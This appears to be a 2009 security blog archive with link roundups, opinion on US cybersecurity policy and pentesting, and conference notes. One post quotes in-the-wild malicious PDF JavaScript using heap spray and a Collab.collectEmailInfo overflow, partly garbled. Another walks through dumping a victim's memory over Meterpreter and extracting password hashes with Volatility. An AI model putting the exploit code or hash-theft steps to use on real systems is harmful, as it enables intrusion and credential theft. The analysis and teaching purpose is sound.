Sunday, March 29, 2009

Shotgun Blast for 29 March 2009

Couple of articles/blog posts worth taking a look at

Info on Ghostnet
*mirrors of the two papers are available above

I am personally glad when I see people getting pwned via client-sides make the news. Hear me and Vince talk about it at Notacon and DojoSec this month!

It's also interesting, at least to me, to see real cyber warfare in action. Cyber warfare doesn't have to be about stuff going boom, but having another nation state all in your network for god knows how long certainly makes you wonder how much of your "secret" activity isn't secret anymore.

Application Operation System Fingerprinting From Dan Crowley
his blog:

Sweet new updates to metasploit!

No link... just svn up your trunk and enjoy! The SNMP community scanner is nice.

Weaponized Malware ??

While the question of what the home user is to do is tougher, in the enterprise keeping up with what is egressing your network may help with catching that malware calling home. It's probably time to start looking at the problem as "it's going to happen, how do I detect and respond" instead of just "hoping" it doesn't happen.

What is Conficker going to do on April 1st?

Do we worry or not? Do you deserve what you get if you still have it in your network after this long?

If you allow gaming systems on your network without authentication can an attacker abuse that?

Definitely something to keep in mind: if a network requires authentication, can you change your MAC to that of a Wii or Xbox 360 and gain access?

Exploiting Unicode Enabled Software by Chris Weber

Tuesday, March 24, 2009

Moving Cybersecurity from DHS to White House

From here:

“Forthcoming legislation would wrest cybersecurity responsibilities from the U.S. Department of Homeland Security and transfer them to the White House, a proposed move that likely will draw objections from industry groups and some conservatives.
CNET News has obtained a summary of a proposal from Senators Jay Rockefeller (D-W.V.) and Olympia Snowe (R-Maine) that would create an Office of the National Cybersecurity Advisor, part of the Executive Office of the President. That office would receive the power to disconnect, if it believes they’re at risk of a cyberattack, “critical” computer networks from the Internet. “I regard this as a profoundly and deeply troubling problem to which we are not paying much attention,” Rockefeller said a hearing this week, referring to cybersecurity…”

and a DHS response here:

I'm a simple guy and I'm going to oversimplify my response. So here goes.

Politics and money aside, because there is a lot of both for this issue (DHS would be dumb not to fight to keep control of mission for the sheer amount of $ being thrown at it), without strong leadership and authority it won't matter who is in charge of cybersecurity for the US.

When I was just getting interested in security and still in college I went to Black Hat New Orleans 2002, and listened to Erik Birkholz's "How To Fix a Broken Window" talk.

From the talk description:

C:\>net send * “Don’t expect secure networks if you haven’t empowered your internal security team.”

Security vs. usability may finally become a balanced equation. All the usability in the world isn’t worth a damn if your internal network is a wasteland of default configurations and blank passwords. Security teams are now a required internal resource. Contrary to popular belief there are NOT 24 working hours in a day. Security can not be treated as a side order. The excuses need to stop - now.

The amount of the above that still rings true 7 years later is just ridiculous, but the important thing I took from that talk 7 years ago that is still true today is: don't give people the responsibility of security and no authority to do anything about it.

So what does that have to do with DHS & the White House and who's calling the shots? Well, the fact that DHS and U.S. Cert have all the responsibility but no authority. The U.S. Cert can send .gov organizations alerts, advice, guidance, incidents, threats, whatever all day long, but at the end of the day they really can't make those .gov entities do shit. That is the sad reality, those other agencies in most situations don't have to listen to the cert or can merely say "we took care of it" and there is no secondary investigation to be done or allowed. Additionally, there seems to be no punishment for receiving failing FISMA grades or having numerous amounts of security incidents, unless you call getting extra funding "to fix the problem" a punishment.

The simple version is this:
If things don't change...if the authority to withhold funds, internet access, or the ability to fire people who show gross incompetence or the inability to handle the security responsibility of their organization, if we don't stop putting people in CSO/CIO positions who have no security background, if getting a failing FISMA grade doesn't actually mean anything, and if we don't change the broke ass way that some .gov agencies operate, it won't matter who is responsible for cybersecurity or how much money you throw at the problem, it's still gonna be jacked up. In fact, who's to blame bad guys for breaking into networks that are just so damn easy to break into?

Thoughts On Pentesting Must Evolve Or Die

So the latest article by Brian Chess didn't stir up quite the controversy that his pentesting dead in 2009 interview/article did, but this one is worth a read:

It's a short article and not nearly as controversial as the dead in 2009 one, but three quotes...

"People are now spending more money on getting code right in the first place than they are on proving it is wrong. However, this does not signal the end of the road for penetration testing, nor should it, but it does change things. Rather than being a standalone product, it is going to be more like a product feature. Penetration testing is going to cease being an end unto itself and re-emerge as part of a more comprehensive security solution."

"2009 will be the year this strategy comes together, and when we look back, it will be the year when most of the world began thinking about penetration testing as part of a larger offering."

All that is good news (I think), secure coding is where things need to go, but I personally don't feel any amount of secure code will ever completely replace pentesting as long as it's possible to mis-configure it or set it up insecurely. So Microsoft Windows at some point may be free of stack overflows (or any memory corruption exploits) but that won't stop some system admin setting up their domain in some insecure fashion. That will still need to be pentested to discover and help remediate. Which leads me to the last quote...

"More than ever before, people understand the software security challenge, and penetration testing deserves credit for helping spread the word. But knowing a security problem exists is not the same as knowing how to fix it. In other words, penetration testing is good for finding the problem but does not help in finding the solution – and that is why it must take a long hard look at itself and then make a change. Just like the venerable spell-checker, it is going to die and come back in a less distinct but more pervasive form and I, for one, cannot wait."

I don't agree with this. Penetration testing/testers should never leave you without a fix to security issues. I know a lot of pentesters and I don't know any that don't give the customer recommendations for remediations, and a customer shouldn't accept a pentest that doesn't have recommended fixes. I suspect that what Chess meant here were "problems" like SQL injection vulns or code bugs that a source code scanning tool could help find and recommend the secure way to code it where a pentester may say "recode it", "have your developers find and fix the code" or "you may have improper parameter checking in this public function", etc.

I do agree that pentesting should evolve, but I think it should begin to look more at assessing an organization from many angles and taking the path of least resistance than pentesting the network side one quarter, the web app side the next, physical security the next, etc. When we begin to identify what makes us money, then look at how we are protecting it across the enterprise, then testing all those defenses at the same time, then we are evolving in the right direction. The evolution should be Full Scope pentesting and not the way most shops do it now.

Anyone else have thoughts on the article?

175+ deleted blog spam posts later...

I've enabled comment moderation and captcha. Normally I wouldn't have cared, but since I sat through Val Smith's and Collin's talk twice on what they are doing with that stuff I couldn't let it linger.

Sorry for the new hoop to jump through, everyone.

If you come across any I missed please let me know.

Monday, March 16, 2009

Attacking Layer 8: Client-Side Penetration Testing SOURCE Boston Edition

Here's the video from our Client-Side talk at SOURCE Boston 2009

Full Scope Security Attacking Layer 8: Client-Side Penetration Testing SOURCE Boston Edition from FullScopeSecurity on Vimeo.

Why SOURCE Boston was the best con I've ever been to

You don't have to just take my word for it...

So we just got back from SOURCE Boston. It was by far the best conference I have ever been to from pretty much all perspectives.

Pretty much all the talks were great, I found myself sitting in talks and wishing I had a second me (I wish that quite frequently actually) so I could sit in one of the other talks. Now this happens often at other cons, but this was for the whole con schedule. The SOURCE advisory board picked great talks. The location of the hotel was great, it wasn't too crowded, and the SOURCE organizers totally took care of the speakers with free food and booze (I felt very well taken care of), the securitytwits with free food and booze, and the con-goers with free food and for pay booze but threw a really nice party. It was also extremely cool to get to interact with some of the Original Gangster l0pht guys and all the other con attendees especially the Attack Research guys, the NYSEC guys, and many many others.

I had such a good time that I'm currently trying to scheme a way to pull off FRHACK, BruCon and SOURCE Barcelona in September.

Oh and for shameless self promotion Chris Wysopal gave our client-side talk a nice review:

PDF Exploits now with Heapspray

So right after the latest Adobe 0-day was found in the wild and it was seen to be using heapspraying as part of the exploit and payload delivery I noticed a change in the other Adobe exploits doing the rounds. Both the Adobe printf() and collectEmailInfo() exploits are now taking advantage of heapspraying. I guess it makes sense considering that most, if not all, of the pdf exploits are being delivered via a link rather than an attachment. The browser will render the pdf within the window and so heapspraying will work nicely. This does limit it to IE though.

Another interesting change is that I'm seeing both exploit vectors in a single pdf. A quick visit to hxxp:// returned a pdf with the following javascript:
function fix_it(yarsp, len)
while (yarsp.length*2
yarsp = yarsp.substring(0,len/2);
return yarsp;
var version = app.viewerVersion;
if (version > 8)
var payload = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9%u5824...snip...");
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize+heapblock.length;
while (bigblock.length
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < block ="" mem =" new" i="0;i<1400;i++)">
var num = 12999999999999999999888888...snip...;
var addkk = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9....snip...");

var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = addkk.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;

for (var count=0;countcount2;count++)
mem_array[count] = yarsp + addkk;
var overflow = unescape("%u0c0c%u0c0c");
while(overflow.length <>
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
Nothing new really but it's always interesting to see how the exploits and their delivery mechanisms evolve.
dean de beer
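
A triage heuristic for the traits visible in the script above (sled filler passed to unescape(), an array filled with concatenated blocks, a viewer version check, and the two call names), written in Python as an added example that is not part of the original post. The indicator names, the scoring in `verdict`, the mapping of "printf()" to Acrobat's `util.printf`, and both sample scripts are assumptions of the example; the snipped payload is replaced by placeholder words.

```python
import re

# Filler words used as sleds in the script quoted above.
SLED_WORDS = {"0a0a", "9090", "0c0c"}
# unescape("..." + "...") taking one or more string literals.
UNESCAPE_RE = re.compile(r'unescape\(\s*((?:"[^"]*"\s*\+?\s*)+)\)', re.I)
WORD_RE = re.compile(r"%u([0-9a-fA-F]{4})")
# Acrobat JavaScript calls the post names as the two exploit vectors
# (assumption: the post's "printf()" is util.printf).
API_RE = re.compile(r"\b(Collab\.collectEmailInfo|util\.printf)\s*\(")
VERSION_RE = re.compile(r"\bapp\.viewerVersion\b")
# Array slot filled with a concatenation, e.g. mem_array[count] = a + b
FILL_RE = re.compile(r"\b\w+\[\w+\]\s*=\s*\w+\s*\+\s*\w+")

# Constructed sample: statements shaped like the quoted script, with the
# snipped payload replaced by two placeholder words (%u4141%u4242).
SAMPLE = '''
var version = app.viewerVersion;
var addkk = unescape("%u0A0A%u0A0A%u0A0A"+"%u4141%u4242");
var yarsp = unescape("%u9090%u9090");
mem_array[count] = yarsp + addkk;
var overflow = unescape("%u0c0c%u0c0c");
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
'''
# Constructed benign script: date formatting and one escaped character.
BENIGN = 'var d = util.printd("yyyy-mm-dd", new Date()); app.alert(unescape("%u00e9"));'


def triage(js):
    """Return a sorted list of indicator names found in PDF JavaScript."""
    hits = set()
    for m in UNESCAPE_RE.finditer(js):
        words = [w.lower() for w in WORD_RE.findall(m.group(1))]
        sled = [w for w in words if w in SLED_WORDS]
        if len(sled) >= 2:
            hits.add("sled_filler")
        # Sled words followed by other words: filler glued to a payload.
        if sled and len(words) > len(sled):
            hits.add("sled_plus_payload")
    for m in API_RE.finditer(js):
        hits.add("api:" + m.group(1))
    if VERSION_RE.search(js):
        hits.add("version_branch")
    if FILL_RE.search(js):
        hits.add("array_fill")
    return sorted(hits)


def verdict(js):
    """Flag a script when spray traits and a targeted call occur together."""
    hits = triage(js)
    spray = "sled_filler" in hits and "array_fill" in hits
    api = any(h.startswith("api:") for h in hits)
    if spray and api:
        return "suspicious"
    return "review" if (spray or api) else "clean"


if __name__ == "__main__":
    for name, script in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, verdict(script), triage(script))
```

The input is JavaScript already extracted from the PDF; decompressing object streams is outside what this example covers.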

Monday, March 9, 2009

Presentation on Client-Side Attacks at SOURCE Boston

Alright, it's time for SOURCE Boston!

I'm happy to announce that g0ne and I will be there presenting on:

Attacking Layer 8: Client-Side Penetration Testing

We'll be talking about why you should be allowing your penetration testers to use client-side attacks during their assessments, how to use the metasploit framework to deliver client-side attacks with demos (yes other tools do CS attacks but we're poor), and some remediations for client-side attacks.

It will be an extra special big day because we'll be presenting as Full Scope Security, our new security consultancy. More on that later.

If you're not going to make it to SOURCE, we will also be at Notacon 16-19 April 09 and ChicagoCon 8-9 May 09

Sunday, March 8, 2009

Dumping Memory to Extract Password Hashes

Originally posted on Attack Research

Dumping memory with MDD using Meterpreter

adapted from:

ManTech Memory DD (MDD) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.

After downloading MDD from the Mantech site you need to run the program at the command line.

MDD Command Line Usage:



C:\tools\mdd> mdd -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 255.48 MB of physical memory to file 'memory.dd'.

65404 map operations succeeded (1.00)
0 map operations failed

took 21 seconds to write
MD5 is: a48986bb0558498684414e9399ca19fc

The output file is commonly referred to as an "image". MDD's function is limited to copying physical memory, so you will have to utilize another tool to analyze the memory image.

Stealing Memory with Metasploit's Meterpreter and MDD

After launching an exploit and receiving a Meterpreter connection, upload MDD.

meterpreter > upload /root/mdd.exe .
[*] uploading : /root/mdd.exe -> .
[*] uploaded : /root/mdd.exe -> .\mdd.exe
meterpreter > ls

Listing: c:\

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT
100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS
100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM
40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS
100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini
100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe
100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr
100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

Execute MDD to capture RAM on the victim machine.

meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\> mdd.exe -o memory.dd
mdd.exe -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

130940 map operations succeeded (1.00)
0 map operations failed

took 23 seconds to write
MD5 is: be9d1d906fac99fa01782e847a1c3144

Optionally we can just use execute to run the tool without opening a command prompt. It really doesn't matter: as we are going to be pulling down 256+ MB of data, we won't exactly be "stealthy".

meterpreter > execute -f mdd.exe -a "-o demo.dd"
Process 3436 created.

Verify memory image has been captured.

meterpreter > ls

Listing: C:\

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969
100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2
100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS
100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2
40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS
100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt
100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini
100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd
100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe
100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr
100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share
100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

Download memory dump using Meterpreter.

meterpreter > download memory.dd .
[*] downloading: memory.dd -> .
[*] downloaded : memory.dd -> ./demo.dd

meterpreter >
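
MDD prints an MD5 and a map-operation count when it finishes, which is enough to check that the file you ended up with is the image that was acquired. The following Python is an added example, not part of the original post or of MDD; `parse_mdd_log`, `file_md5`, `verify_image` and the figure of 4 KiB per map operation are assumptions of the example (65404 x 4096 bytes is 255.48 MB, matching the first log above).

```python
import hashlib
import re

PAGE_SIZE = 4096  # assumption: one map operation copies one 4 KiB page

LOG_FIELDS = {
    "mb": r"Dumping ([\d.]+) MB of physical memory",
    "mapped": r"(\d+) map operations succeeded",
    "failed": r"(\d+) map operations failed",
    "md5": r"MD5 is: ([0-9a-fA-F]{32})",
}

# Lines taken from the first MDD run shown earlier in the post.
SAMPLE_LOG = """-> Dumping 255.48 MB of physical memory to file 'memory.dd'.
65404 map operations succeeded (1.00)
0 map operations failed
MD5 is: a48986bb0558498684414e9399ca19fc
"""


def parse_mdd_log(text):
    """Extract size, map-operation counts and MD5 from MDD console output."""
    out = {}
    for name, pattern in LOG_FIELDS.items():
        m = re.search(pattern, text)
        if m is None:
            raise ValueError("MDD log is missing field: " + name)
        out[name] = m.group(1)
    return {"mb": float(out["mb"]), "mapped": int(out["mapped"]),
            "failed": int(out["failed"]), "md5": out["md5"].lower()}


def file_md5(path, chunk=1 << 20):
    """Hash the image in chunks so a large dump is never loaded whole."""
    digest, size = hashlib.md5(), 0
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
            size += len(block)
    return digest.hexdigest(), size


def verify_image(log_text, path):
    """Return a list of problems; an empty list means the copy matches the log."""
    log = parse_mdd_log(log_text)
    md5, size = file_md5(path)
    problems = []
    if log["failed"]:
        problems.append("%d pages could not be read at acquisition" % log["failed"])
    expected = log["mapped"] * PAGE_SIZE
    if size != expected:
        problems.append("size %d != expected %d" % (size, expected))
    if md5 != log["md5"]:
        problems.append("MD5 mismatch: " + md5)
    return problems


if __name__ == "__main__":
    info = parse_mdd_log(SAMPLE_LOG)
    print(info, info["mapped"] * PAGE_SIZE)
```

A transfer that stops early shows up as both a size and an MD5 problem, so run the check before starting any analysis on the image.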

Now that we have our .dd image locally you can utilize instructions from to grab the passwords out of memory.

Volatility -->

Installation and getting started: Download and unzip volatility from the above location, download and install the patches from --> You will need to overwrite your existing forensics, memory_objects, and memory_plugins folders. Once you are done, running python volatility should show the hivescan/hivelist options as well as other stuff.

$ python volatility

Volatile Systems Volatility Framework v1.3
Copyright (C) 2007,2008 Volatile Systems
Copyright (C) 2007 Komoku, Inc.
This is free software; see the source for copying conditions.

usage: volatility cmd [cmd_opts]

Run command cmd with options cmd_opts
For help on a specific command, run 'volatility cmd --help'

Supported Internel Commands:
connections Print list of open connections
connscan Scan for connection objects
connscan2 Scan for connection objects (New)
datetime Get date/time information for image
dlllist Print list of loaded dlls for each process
dmp2raw Convert a crash dump to a raw dump
dmpchk Dump crash dump information
files Print list of open files for each process
hibinfo Convert hibernation file to linear raw image
ident Identify image properties
memdmp Dump the addressable memory for a process
memmap Print the memory map
modscan Scan for modules
modscan2 Scan for module objects (New)
modules Print list of loaded modules
procdump Dump a process to an executable sample
pslist Print list of running processes
psscan Scan for EPROCESS objects
psscan2 Scan for process objects (New)
raw2dmp Convert a raw dump to a crash dump
regobjkeys Print list of open regkeys for each process
sockets Print list of open sockets
sockscan Scan for socket objects
sockscan2 Scan for socket objects (New)
strings Match physical offsets to virtual addresses (may take a while, VERY verbose)
thrdscan Scan for ETHREAD objects
thrdscan2 Scan for thread objects (New)
vaddump Dump the Vad sections to files
vadinfo Dump the VAD info
vadwalk Walk the vad tree

Supported Plugin Commands:
cachedump Dump (decrypted) domain hashes from the registry
hashdump Dump (decrypted) LM and NT hashes from the registry
hivelist Print list of registry hives
hivescan Scan for _CMHIVE objects (registry hives)
lsadump Dump (decrypted) LSA secrets from the registry

memmap_ex_2 Print the memory map
printkey Print a registry key, and its subkeys and values
pslist_ex_1 Print list running processes
pslist_ex_3 Print list running processes
usrdmp_ex_2 Dump the address space for a process

Example: volatility pslist -f /path/to/my/file

1. Run hivescan to get hive offsets

$ python volatility hivescan -f demo.dd
Offset (hex)
42168328 0x2837008
42195808 0x283db60
47598392 0x2d64b38
155764592 0x948c770
155973608 0x94bf7e8
208587616 0xc6ecb60
208964448 0xc748b60
234838880 0xdff5b60
243852936 0xe88e688
251418760 0xefc5888
252887048 0xf12c008
256039736 0xf42db38
269699936 0x10134b60
339523208 0x143cb688
346659680 0x14a99b60
377572192 0x16814b60
387192184 0x17141578
509150856 0x1e590688
521194336 0x1f10cb60
523667592 0x1f368888
527756088 0x1f74eb38

2. Run hivelist with the first hivescan offset

$ python volatility hivelist -f demo.dd -o 0x2837008
Address Name
0xe2610b60 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe25f0578 \Documents and Settings\Sarah\NTUSER.DAT
0xe1d33008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c73888 \Documents and Settings\LocalService\NTUSER.DAT
0xe1c04688 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1b70b60 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1658b60 \WINDOWS\system32\config\software
0xe1a5a7e8 \WINDOWS\system32\config\default
0xe165cb60 \WINDOWS\system32\config\SAM
0xe1a4f770 \WINDOWS\system32\config\SECURITY
0xe1559b38 [no name]
0xe1035b60 \WINDOWS\system32\config\system
0xe102e008 [no name]

3. Find Password Hash (-y System Hive Offset)(-s SAM Hive

$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60

Couple of updates

1. This technique only works on XP SP2 & SP3, no Vista, no Server 2003

2. New home for volreg plugins: